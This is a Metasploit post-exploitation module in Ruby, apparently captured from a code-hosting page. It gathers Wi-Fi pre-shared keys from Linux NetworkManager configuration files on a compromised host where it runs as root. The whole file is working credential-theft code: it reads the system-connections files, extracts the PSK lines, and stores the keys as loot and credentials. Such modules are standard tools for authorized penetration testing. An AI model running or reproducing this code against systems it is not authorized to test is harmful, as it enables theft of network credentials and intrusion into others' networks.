Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Post
7
  include Msf::Post::File
8
  include Msf::Post::Linux::Priv
9
  include Msf::Post::Linux::System
10
  include Msf::Auxiliary::Report
11

12
  def initialize(info = {})
13
    super(
14
      update_info(
15
        info,
16
        'Name' => 'Linux Gather NetworkManager 802-11-Wireless-Security Credentials',
17
        'Description' => %q{
18
          This module collects 802-11-Wireless-Security credentials such as
19
          Access-Point name and Pre-Shared-Key from Linux NetworkManager
20
          connection configuration files.
21
        },
22
        'License' => MSF_LICENSE,
23
        'Author' => ['Cenk Kalpakoglu'],
24
        'Platform' => ['linux'],
25
        'SessionTypes' => ['shell', 'meterpreter'],
26
        'Notes' => {
27
          'Stability' => [CRASH_SAFE],
28
          'Reliability' => [],
29
          'SideEffects' => []
30
        }
31
      )
32
    )
33

34
    register_options([
35
      OptString.new('DIR', [true, 'The path for NetworkManager configuration files', '/etc/NetworkManager/system-connections/'])
36
    ])
37
  end
38

39
  def connections_directory
40
    datastore['DIR']
41
  end
42

43
  def extract_psk_from_file(path)
44
    return if path.blank?
45

46
    print_status("Reading file #{path}")
47
    data = read_file(path)
48

49
    return if data.blank?
50

51
    data.each_line do |l|
52
      next unless l.starts_with?('psk=')
53

54
      psk = l.split('=')[1].strip
55

56
      return psk unless psk.blank?
57
    end
58

59
    nil
60
  end
61

62
  def run
63
    unless is_root?
64
      fail_with(Failure::NoAccess, 'You must run this module as root!')
65
    end
66

67
    connection_files = dir(connections_directory)
68

69
    if connection_files.blank?
70
      print_status('No network connections found')
71
      return
72
    end
73

74
    tbl = Rex::Text::Table.new({
75
      'Header' => '802-11-wireless-security',
76
      'Columns' => ['AccessPoint-Name', 'PSK'],
77
      'Indent' => 1
78
    })
79

80
    connection_files.each do |f|
81
      psk = extract_psk_from_file("#{connections_directory}/#{f}")
82
      tbl << [f, psk] unless psk.blank?
83
    end
84

85
    if tbl.rows.empty?
86
      print_status('No wireless PSKs found')
87
      return
88
    end
89

90
    print_line("\n#{tbl}")
91

92
    p = store_loot(
93
      'linux.psk.creds',
94
      'text/csv',
95
      session,
96
      tbl.to_csv,
97
      'wireless_credentials.txt'
98
    )
99

100
    print_good("Credentials stored in: #{p}")
101

102
    tbl.rows.each do |cred|
103
      user = cred[0] # AP name
104
      password = cred[1]
105
      create_credential(
106
        workspace_id: myworkspace_id,
107
        origin_type: :session,
108
        address: session.session_host,
109
        session_id: session_db_id,
110
        post_reference_name: refname,
111
        username: user,
112
        private_data: password,
113
        private_type: :password
114
      )
115
    end
116
  end
117
end
118

119